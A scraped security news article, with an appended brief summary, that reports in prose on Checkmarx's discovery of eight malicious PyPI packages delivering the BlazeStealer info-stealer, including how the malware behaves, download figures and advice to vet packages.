Article Details
Scrape Timestamp (UTC): 2023-11-08 12:59:56.711
Source: https://thehackernews.com/2023/11/beware-developers-blazestealer-malware.html
Original Article Text
Click to Toggle View
Beware, Developers: BlazeStealer Malware Discovered in Python Packages on PyPI. A new set of malicious Python packages has slithered their way to the Python Package Index (PyPI) repository with the ultimate aim of stealing sensitive information from compromised developer systems. The packages masquerade as seemingly innocuous obfuscation tools, but harbor a piece of malware called BlazeStealer, Checkmarx said in a report shared with The Hacker News. "[BlazeStealer] retrieves an additional malicious script from an external source, enabling a Discord bot that gives attackers complete control over the victim's computer," security researcher Yehuda Gelb said. The campaign, which commenced in January 2023, entails a total of eight packages named Pyobftoexe, Pyobfusfile, Pyobfexecute, Pyobfpremium, Pyobflite, Pyobfadvance, Pyobfuse, and pyobfgood, the last of which was published in October. These modules come with setup.py and init.py files that are designed to retrieve a Python script hosted on transfer[.]sh, which gets executed immediately upon their installation. Called BlazeStealer, the malware runs a Discord bot and enables the threat actor to harvest a wide range of information, including passwords from web browsers and screenshots, execute arbitrary commands, encrypt files, and deactivate Microsoft Defender Antivirus on the infected host. What's more, it can render the computer unusable by ramping up CPU usage, inserting a Windows Batch script in the startup directory to shut down the machine, and even forcing a blue screen of death (BSoD) error. "It stands to reason that developers engaged in code obfuscation are likely dealing with valuable and sensitive information, and therefore, to a hacker, this translates to a target worth pursuing," Gelb noted. A majority of downloads associated with the rogue packages originated from the U.S., followed by China, Russia, Ireland, Hong Kong, Croatia, France, and Spain. They were collectively downloaded 2,438 times before being taken down. "The open-source domain remains a fertile ground for innovation, but it demands caution," Gelb said. "Developers must remain vigilant, and vet the packages prior to consumption."
Daily Brief Summary
A report from Checkmarx revealed the existence of a new form of malware called BlazeStealer in seemingly harmless Python packages on the Python Package Index (PyPI) repository. The malware aims to steal sensitive information from compromised developer systems.
Since January 2023, eight malicious packages have been detected on PyPI, with the latest being released in October. When installed, the packages retrieve a Python script which gets executed immediately, resulting in the malware running a Discord bot.
The bot allows the threat actor to gather information such as web browser passwords, screenshots, etc., execute random commands, encrypt files and disable Microsoft Defender Antivirus on the infected system. It can also consume excessive CPU usage, insert a Windows Batch script in the startup directory to shut down the machine, and even cause a blue screen of death error.
The majority of the rogue package downloads were traced back to the U.S., followed by China, Russia, Ireland, Hong Kong, Croatia, France, and Spain. They were collectively downloaded 2,438 times before being removed.
Checkmarx recommends developers vet packages before consumption, given that the open-source domain is fertile ground for hackers to exploit.